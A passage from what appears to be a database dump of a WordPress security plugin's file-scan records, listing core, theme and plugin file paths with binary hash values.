�w�a5','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������\\ƥ�/��','�+�w}�U�K�f�%f�q��荁��im��\Z��','',0,'?'),('��.�}�b8����5i','wp-includes/wp-includes/sodium_compat/src/File.php',0,'c�]-�@W�\\0��Wv','c�]-�@W�\\0��Wv','�c`�C(ߛ�V�S6ب�c�s�u8�6��l','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��s�[0�\n��2-�','a����RC�J)�!�{Mt@�B}�\n�G�5��\0','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#�� ��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Nm �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�$���1��g��,q','wp-includes/wp-includes/block-patterns/two-buttons.php',0,'B���8$�6��v','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ�� \0y','',0,'?'),('�4�,�,DO-\r8�r~','wp-content/themes/newsmag/assets/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.C�D|փ�!b�Q���','h��VC{�B�{���4O�b�]=��;X)��(X�','',0,'?'),('�H��\\�\\�j��ѕ7','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-preset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���=H�(!�-y�','�d��u�D�:}��LD�pX�Le¸|���\r�','',0,'?'),('�Uh0���6ۯ�Bvb�','wp-content/themes/promote/inc/kirki/assets/js/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]�L`CO����rk�','|]��yX�E��G�@��w!2��Ѣ�(','',0,'?'),('�Y��dB\n;���/�','wp-content/themes/anima/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��X�M3Q�^�*�rA','#�ڎ�ʾE1cw�閅��b�m��~�>a3�7b','',0,'?'),('�k-§#���^��VU','wp-includes/wp-includes/js/dist/plugins.js',0,'OBb�?�Ɖ�х��','OBb�?�Ɖ�х��','�[��ɉ��NN�^p��D_S��r�pI~8,�v','',0,'?'),('�yѼ5��!*�� ��','wp-content/themes/twentytwentyone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gd�w���}�$\'e�','E�u)��l��E�4����觏�篓�W���zF','',0,'?'),('Y��w�;mU5-��','wp-includes/wp-includes/compat.php',0,' ��}�as� ����?�w',' ��}�as� ����?�w','��K���yc��TsKfsb{���- k�X��','',0,'?'),('�d/S\Z�ѝ�w�*D[S','wp-content/themes/sg-window/page-templates/full-contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�mE��\'�\ZY','��iDk�_���\r��m�{�,���!^\\~�?','',0,'?'),('��4س�\n��&S:\r','wp-includes/wp-includes/js/autosave.min.js',0,'��CGs|I�\"�~�}}c','��CGs|I�\"�~�}}c','#��ð�|�d�L��W���kY�W�](�y;�','',0,'?'),('�9fUP M �P�2u','wp-includes/wp-includes/blocks/tag-cloud.php',0,'�@{�\Z9ڛ���S6��1','�@{�\Z9ڛ���S6��1','��1�ʪ���V�IT/���m�w/(\'��t�+�','',0,'?'),('�ۺ�\Z$=ߴ�U:�`','wp-content/themes/auberge/includes/welcome/welcome.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n`i_��{�`Ϥ��{','m������ZZ�����j�>��5�Ygs','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t� �ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��Q�t�/(�$Dy�','wp-includes/wp-includes/js/codemirror/csslint.js',0,'��M_ϱI����l�','��M_ϱI����l�',']�ih4F��ò�\r��U����WEK(�P�d','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('���%&}�\Zʤfc� ','wp-content/themes/event/page-templates/contact-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�^c��#�|C��','0���p�r����%������]j�V��','',0,'?'),('���!�pQ`� G\"�6N�','wp-includes/wp-includes/Requests/Exception/HTTP/503.php',0,'9�RaßC�`\0�UT�','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('���렧�Q�jCKx`','wp-content/themes/promote/inc/kirki/assets/scss/controls/checkbox.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8.��P��t���({','Y^q³�V���M3A��~�v�sx+���Uݼ�','',0,'?'),('����D��nk���','wp-content/themes/twentytwentyone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wu�e\Z�A�K� m�','Uř�����!¿r�Iq�q�[�j�BCY�Pl%','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�KpT�w�J���M�','wp-content/themes/showcase-lite/images/mobile_nav_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I����Y#��&٩O','/E��tX`6�G�>�EPx>�k�[�E���','',0,'?'),('�Z�jϡ{�5�z;�m�','wp-content/themes/skt-pathway/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�s.���TW�$�','D���Q;CT2��I�Iw\0�ŋI�\"��Y�N�','',0,'?'),('� C��͍�ikniA','wp-includes/wp-includes/js/dist/notices.min.js',0,'�����,s\Z���`a','�����,s\Z���`a','e}��䁸7Y|E:E�ڧ�;�m�*cZ��v�Q\r�','',0,'?'),('�(Q�_f^131X��','wp-content/themes/gambit/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~:��%�ӯ4��X','-v6Ll�,��7�\\z�aM�[ն&Gw���','',0,'?'),('�(�Ӌ\Z �r��O�','wp-content/themes/auberge/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�h_���\n��C0\n','9-֣gVҿ��\r��r��8��u��:��ν�=','',0,'?'),('�/D*�_�9��*���0�','wp-content/themes/hueman/assets/czr/js/czr-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��Sha�(�','�X���k������^�����3��,8�b','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~���� pd�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�b�m|\"�[^�oh��','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�ikox�E%��x�U','G�M\"R��W.`�x������֎.�Q�\\��i�K','',0,'?'),('�cRN3���H�����','wp-includes/wp-includes/css/editor-rtl.min.css',0,'��A^�I���4�B\'','��A^�I���4�B\'','ɗ(�|��m��F�EHS7��^��~#����','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('��]1���\Z�>','wp-content/themes/sg-window/inc/widget-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"K�g�o<ˌ�M�','�TvڐYF��6Z<��\'ck��*x��0��','',0,'?'),('�Ze�*�+h`��c','wp-content/themes/maxbusiness/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!Oʴ����Opᶻ','���}պęG�Pw�\Z�\n�>\r�翜��w�','',0,'?'),('��e�y8�Z\r;B','wp-content/themes/newsmag/template-parts/banner/banner-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%s�Z�\Z��v','��H�t�_[�I`I��.�Cx)\Z�֭�Jh�','',0,'?'),('�3 E-���#_yt�','wp-content/themes/Yegor/inc/tabs.php',0,'-��!��aKP����<p','-��!��aKP����<p','����B�ey\0�O�N0��S,n\\�z�o��ݗ4','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'��� t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('���KZ;�����3���','wp-content/themes/maxbusiness/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�e� ��cp���ݹU','�!8�n\\�dj�\r�n5�槪��Vw�St��','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��H\nC8h��:��N','I�\r�u}�����Yw�Su:<IF���','',0,'?'),('��S�2��6�[o�\r#','wp-content/themes/hueman/option-tree/assets/js/vendor/jquery/jquery-ui-timepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�š2�H~G�WQ��','\r(;E^��HcN�3v�#y��N���','',0,'?'),('����[�>f4YBSY<�','wp-includes/wp-includes/js/jquery/ui/slider.js',0,'��}�U���Ƥ����','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('����A�υ-0*����','wp-content/themes/skt-pathway/images/slides/slide3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(>�PA��k��l��\Z�','�~2MKݍ�� �a d����I��.�','',0,'?'),('��~��t#����<M�=','wp-includes/wp-includes/class-wp-roles.php',0,'��?T�v���|U�y','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�n�?2��a~��','�+p��=���ͨ�\'�Bk���@Cr\'ͺ�\'','',0,'?'),('�㯩� \'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X% �<8�g4�','',0,'?'),('��&�e3%$��8:�:w','wp-content/themes/advance/inc/kirki/assets/js/controls/palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�x���Bq�#�\n��','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wz�PQQ�#�Z>\0��D�','���i:��i`�\"��J��%<:���I��xcJ','',0,'?'),('����g���Z��','wp-content/themes/auberge/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2]j�䥎���\'�','f�p{a�F�����P�]����h�F����','',0,'?'),('�����r��o�r��','wp-includes/wp-includes/class-wp-customize-section.php',0,'�`;�V�\'���(��)','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �������Q��L','���R21�?nj*=bͥ}�����X&��M��Ʒ','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?с;��9�A����t�\n','�k���O�{d��PS���\0M�\"B]�\"�E��','',0,'?'),('�c��LB0l�Ԋ�','wp-content/themes/anima/admin/defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�홉����`��','����.$�ĴMG5ވ��Mr�U=��v�Z','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�)~�]b6M�p͞s��2','wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js',0,'Y�����2İ\rm}%��','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�1��v\nE\'�(�ltX�','wp-content/themes/storeone/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xi�l��%�p�A�','�H�o,�8�Jz�����8�fm�ОVp%3','',0,'?'),('�@?>�5�����D��','wp-includes/wp-includes/Requests/Response/Headers.php',0,'\Z�ÂҶ�A-��>c�`','\Z�ÂҶ�A-��>c�`','�E�\n�F � ���M���%{��a���`,�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�0� h�mNP���','��LH$G/�bd�+�\0ZP5��Y~�b��20p','',0,'?'),('�U�V5�-�\'�{+W','wp-content/themes/sg-window/sidebar-2-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�9����AT��� ','�6\'�S ^�� ]����灸9f^��wL�p��[�','',0,'?'),('�X��b������])<�','wp-content/themes/hueman/assets/front/img/demo/4-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(뾄ƙI�v\0','�T>�q�F����qD�fi�P@?��U;-�','',0,'?'),('�da�P�o��9� �','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/<8uA��P','����ٚ�W��ct�GR�/�*]��z��3','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t I �C@g���','�(��(� (\'S)\0B��_}&l�&�o^s�','',0,'?'),('�c$D�5\rGX','wp-content/themes/skt-pathway/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?���Ae��wԅ','���2��y{�i�|�.Ȏ�v�tdDA&��$','',0,'?'),('�UdL�ѣy}���a�','wp-includes/wp-includes/js/jquery/ui/datepicker.min.js',0,'�4}�aX2nH��GWx�{','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('�+r8�_�R�*��','wp-content/themes/promote/inc/kirki/assets/css/customizer.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\\fN�m?�n=���','^��}v�d�g�w�9�(o8x�RE?�%�<�','',0,'?'),('��rt0�iܶ�','wp-content/themes/gambit/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ڧ�W��^��yt','��J_�#\Z4�Ԣ�0�%p�@�q�:\n�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��* [\0EE*J�r�V�s�����c�?','',0,'?'),('�V�X`ei3\n*�g�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-date-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��\Zv�ٮ=V�nEL�','A<O�Q2��J�3�p�5�JMi�c� {<Χ','',0,'?'),('�v~�;|�b��@�R','wp-content/themes/kidzoo-lite/sass/base/_menus.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ���]�Ϣ��{�{��','+���l�b���+�h��H�O���Y�T��','',0,'?'),('�K��o�W���<�','wp-content/themes/spidermag/template-parts/login-register.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��j0H�$ p|c�\\�','\r��6��c��\'rѸ�.+\Z��-d%~!�','',0,'?'),('�~���:��+sP�/�','wp-includes/wp-includes/Requests/Auth/Basic.php',0,'g��x̄� 4U� k!C','g��x̄� 4U� k!C','.�йh�dBiHɀ�n�s�����\\���O','',0,'?'),('�V��JNr>�r�Q�','wp-content/themes/kidzoo-lite/inc/enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A=���!v�|F�iK','��G*Aa{��L�k��\n��g��H\r��','',0,'?'),('���4��3a���7','wp-includes/wp-includes/widgets/class-wp-widget-media-video.php',0,'}◷>y�O�G�','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('�\'ݒ\rTvr���ŷ�','wp-content/themes/weblog/assets/img/no-image-690-400.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�6�ؑ���`�q���',')S?�zZ�C� zB�]�A�n�L���抒���Q','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('��R(�R�����D�','wp-includes/wp-includes/css/dist/block-library/theme.css',0,'Gs�Ib<���w]G��','Gs�Ib<���w]G��','כ�ppr��xI�xP^�? ���N�%�u�','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('��E}����I��0Y�','wp-content/themes/event/inc/customizer/functions/featured-content-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��P�ŎB\0��4�','F�ɻ���B~�O�>��,n����?6m��E�','',0,'?'),('��h�R���Y�*A{��','wp-includes/wp-includes/images/spinner-2x.gif',0,'1����2��^#�8��','1����2��^#�8��','��#�˒�=$c��6����� B��4�6','',0,'?'),('���O�^k�E�]�Ar','wp-includes/wp-includes/js/dist/redux-routine.min.js',0,'�;TvCg�)Cb\r','�;TvCg�)Cb\r',';hT�*�ݠO���mVggd�\n�@Pp6{}','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%\'d \\������sPu�','���o^ ��I���_qJ�s��=�-+����','',0,'?'),('�6��e\r~��|l','wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php',0,'Q�-�����*xrf�','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô� ͥ��5 �Q�������9�J','',0,'?'),('�&�?.\r�s��;�=9','wp-content/themes/twentynineteen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}D�&��J����','z<����@���I�W�JP\n�T^tۜ�E�','',0,'?'),('��q�!#^�4�!��','wp-content/themes/spidermag/assets/images/preloader/rhombus.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ɏ��|�_(zȵm\re�','ߴ8�noS1�L�b]-�Y�0����J��.F','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�wHɷ ���P�?��','���A��7��}�&��?���%��w�\"���W','',0,'?'),('�&���n�duV*�\\','wp-content/themes/hueman/functions/czr/tmpl/modules/all-modules-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�^���P\Z��v2�','��o��}�����\Z��@CS�\"�W��O�|`��','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�9�\'lafT�zÅ��','wp-content/themes/Endolf/FT/colors.php',0,'|݄���Q���','|݄���Q���','SU��C��ZL҆A�;)�J���\'�','',0,'?'),('�@X���-�+���D�','wp-content/themes/hueman/assets/front/img/thumb-standard.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')%���Q��n���5','}f�MWyw�H���pz�|�^��TRq�lg�8i�','',0,'?'),('�A&�q\Z$���Z�ǘ','wp-content/themes/spidermag/assets/images/add-486x60.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|�` �4�d���','�7�&5�\n�]�����5��O>� �/X�','',0,'?'),('�D{X5 ��K(�?�o','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-framework-admin.php',0,'ފX�qq�&zʭw�','ފX�qq�&zʭw�','��AQ��#F���fScI�m�|80��n�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�\'�;I6��U+�K�','A�Οն<��ލ��&0��>�k]�-GfN�','',0,'?'),('�dD�3Fa�D�h����','wp-content/themes/anima/cryout/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I���;/�dP��c�','��c��s Sd�G��)?r��讇��c�','',0,'?'),('�Z �=9z�','wp-content/themes/Kent/FT/inc/lessc.php',0,'���y\\������wб=','���y\\������wб=','�*�-wc�N��8qEiIy1\Zs���N�d�@�','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('��+�\rv4�<Af���','wp-content/themes/auberge/library/visual-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�@��i+��_c��','�CK���gз�5�\'n��3��C���b%��@�','',0,'?'),('�?�rT?f���C(','wp-content/themes/maxbusiness/js/simple-lightbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��g���w�h|N','1�\n}�KW�R�\\\"kf��m5�$�6��6\0\n�u','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�POůJ�~�l�.�J','�o���`|?�0�5���q����_ !-+}Q�V-�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i@�\\�`=�y�7\0','���-\020�[��5�B���c��^V�u8��k�','',0,'?'),('�����j�c��8�L','wp-content/themes/vision-lite/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʸ��R̍o�i��s','�o F�c����Қ����\Z��u�ߴ�F$�','',0,'?'),('������W�L�TB�','wp-content/themes/travel-stories/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�Q��,Y,�r���}%','��P#fNS��X�����.�V+a�','',0,'?'),('��q<�D>ܲ��6��','wp-includes/wp-includes/ms-functions.php',0,'�Q\n����[�|�J/�','�Q\n����[�|�J/�','�8f�٣���<}.Q��������','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('��͜�ή{�&(t�ӫ','wp-includes/wp-includes/css/dist/editor/editor-styles.css',0,'�iۘ\"���뱠��','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�m�?R n�U}�Y','wp-content/themes/Endolf/FT/plugin/options-framework/js/media-uploader.js',0,'�A���@�k@VgdH','�A���@�k@VgdH','�l��k��&��Snt��m���b�̧:S���-1','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��bR<sr|�g>�','���g��f�jt�����4�H\'؞�W�\rR�~�','',0,'?'),('�#��]�grW�,p�','wp-content/themes/gambit/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Mz6�]u�g��@V�','a���[��,#��P>ʢC\ra������w��^1','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�#1���@伫֝k','y�\"pB�c�h��\0�PhD�Rd��\0bKO��','',0,'?'),('�C��\n��C�odU�l�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�l���F��|*','�oN��j��TK�pKy��F�u\"�PM0�','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1q��X}k8�','����\ZI(�b��ܚo��ߍ�9�\0� ȅE2','',0,'?'),('�j`0{�J3�p1�','wp-content/themes/promote/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Yn�XXҒ�``�,X','���U�@ 